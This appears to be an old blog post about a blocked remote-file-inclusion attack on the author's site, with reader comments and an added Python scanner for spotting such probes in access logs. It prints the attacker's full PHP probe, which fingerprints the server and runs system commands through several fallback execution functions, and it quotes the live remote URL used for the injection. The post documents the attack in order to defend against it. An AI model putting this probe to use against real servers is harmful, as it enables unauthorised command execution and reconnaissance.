Here we go again with the hackers making another run at one of my websites trying to inject PHP code into a site that doesn't even have PHP enabled which is amusing at best.
The script they were trying to inject was located here:
http://www.doncapone.com.br/.,/n?
Here's a copy of their PHP script for your viewing pleasure:
<?
// Fingerprint the host: kernel/uname string and the OS constant (the @ suppresses warnings).
$ker = @php_uname();
$osx = @PHP_OS;
echo "f7f32504cabcb48c21030c024c6e5c1a<br>"; // md5('xeQt'): a marker that tells the attacker the injected code actually ran
echo "Uname:$ker<br>";
echo "SySOs:$osx<br>";
// Pick a command that reveals the account the web server runs as ("id" on Unix).
if ($osx == "WINNT") { $xeQt="ipconfig -a"; }
else { $xeQt="id"; }
$hitemup=ex($xeQt);
echo $hitemup;

// Try every command-execution function in turn, so that disabling just one of
// them with disable_functions is not enough to stop the probe.
function ex($cfe)
{
    $res = '';
    if (!empty($cfe))
    {
        if(function_exists('exec'))
        {
            @exec($cfe,$res);
            $res = join("\n",$res);
        }
        elseif(function_exists('shell_exec'))
        {
            $res = @shell_exec($cfe);
        }
        elseif(function_exists('system'))
        {
            // system() writes straight to output, so capture it with output buffering
            @ob_start();
            @system($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif(function_exists('passthru'))
        {
            @ob_start();
            @passthru($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif(@is_resource($f = @popen($cfe,"r")))
        {
            // last resort: read the command's stdout through a pipe
            $res = "";
            while(!@feof($f)) { $res .= @fread($f,1024); }
            @pclose($f);
        }
    }
    return $res;
}
?>
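As an added example (not part of the original post), here is a small log scanner for spotting the kind of remote-file-inclusion probe described above: a request whose query parameter carries a URL to another host, typically ending in "?" the way the injected URL does. It assumes Apache combined-format access logs; the sample lines are constructed, and only the injected URL itself comes from the post.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Apache "combined" format. Only the injected URL
# (the one quoted in the post) is real; IPs, paths and timestamps are made up.
SAMPLE_LOG = r'''
203.0.113.7 - - [20/May/2007:12:38:06 +0200] "GET /index.php?page=http://www.doncapone.com.br/.,/n? HTTP/1.1" 403 512 "-" "Mozilla/4.0"
198.51.100.9 - - [20/May/2007:12:39:10 +0200] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.9 - - [20/May/2007:12:40:00 +0200] "GET /go?url=https://example.org/docs HTTP/1.1" 302 0 "-" "Mozilla/5.0"
'''

# Enough of the combined format to pull out client IP, request target and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

def rfi_candidates(target, trusted_hosts=()):
    """Return (param, value) pairs whose value is an absolute URL to another host.

    An RFI probe passes a URL as a parameter value so that a vulnerable
    include()/require() fetches and runs it. The trailing '?' on the value,
    as in the post's URL, turns anything the script appends into a query
    string that the remote host simply ignores.
    """
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        v = urlsplit(value)
        if v.scheme in ("http", "https", "ftp") and v.netloc and v.netloc not in trusted_hosts:
            hits.append((name, value))
    return hits

def scan_log(text, trusted_hosts=()):
    """Return one finding per request whose query string carries a foreign URL."""
    findings = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        hits = rfi_candidates(m["target"], trusted_hosts)
        if hits:
            findings.append({
                "ip": m["ip"],
                "status": int(m["status"]),
                "params": hits,
                # a value ending in '?' is the classic RFI tell, worth a higher severity
                "trailing_qmark": any(value.endswith("?") for _, value in hits),
            })
    return findings
```

Legitimate redirect parameters (the constructed `/go?url=` line) show up too, so pass the hosts you intentionally link to in `trusted_hosts` to keep the noise down.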
Here's a list of IPs with reverse DNS of the botnet involved with the attack, so you can get an idea that any machine can be infected; it's pretty random:
Pretty random list of sites infected with this botnet from locations throughout the world.
The bot blocker shut down all these attempts but I wonder what they'll try next time?
4 comments:
What did the script do?
What kind of site was it?
The site was hacked, they weren't involved.
The script is a type of shell script, the entryway into the server; it's a probe.
I ran this search: else { $xeQt="id"; }.
I'm very curious what OS those hacked boxes are running.
Google Wireless Transcoder being used in a hacking attempt.
Log File
- Request contained a malicious JavaScript or SQL injection attack
Header
- GET /node/4124#comment-501 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Encoding: gzip Accept-Language: en-us Cookie: PHPSESSID=554c98325f86ae95927204be27b834bc; bb2_screener_=1195063773+72.14.193.1+86.106.50.55 Host: www.xxx.com Referer: http://www.xxx.com/node/4124 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3; IEMB3) X-Forwarded-For: 86.106.50.55 X-moz: prefetch
IP Whois = 72.14.193.1 - - [20/May/2007:12:38:06 +0200] "GET /images/cs.gif HTTP/1.1" 200 546 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Google Wireless Transcoder;)"
This is the hacker:
inetnum: 86.106.32.0 - 86.106.63.255
netname: SC-UPC-ROMANIA-SA
descr: SC UPC Romania SA
descr: str. Herastrau 17
descr: Bucuresti 1
country: ro
admin-c: AH1598-RIPE
tech-c: MA190-RIPE
status: ASSIGNED PA
remarks: Registered trough http://www.jump.ro/ip.html
mnt-by: RO-MNT
mnt-lower: RO-MNT
mnt-routes: ASTRALTELECOM-MNT
source: RIPE Filtered
person: Astral Telecom Hostmaster
address: Astral Telecom SA
address: ROMANIA
phone: 40 264 414688
fax-no: 40 264 414687
e-mail: hostmaster@astral.ro
I blocked 86.106.32.0/19 about 6 months ago and the garbage still got through.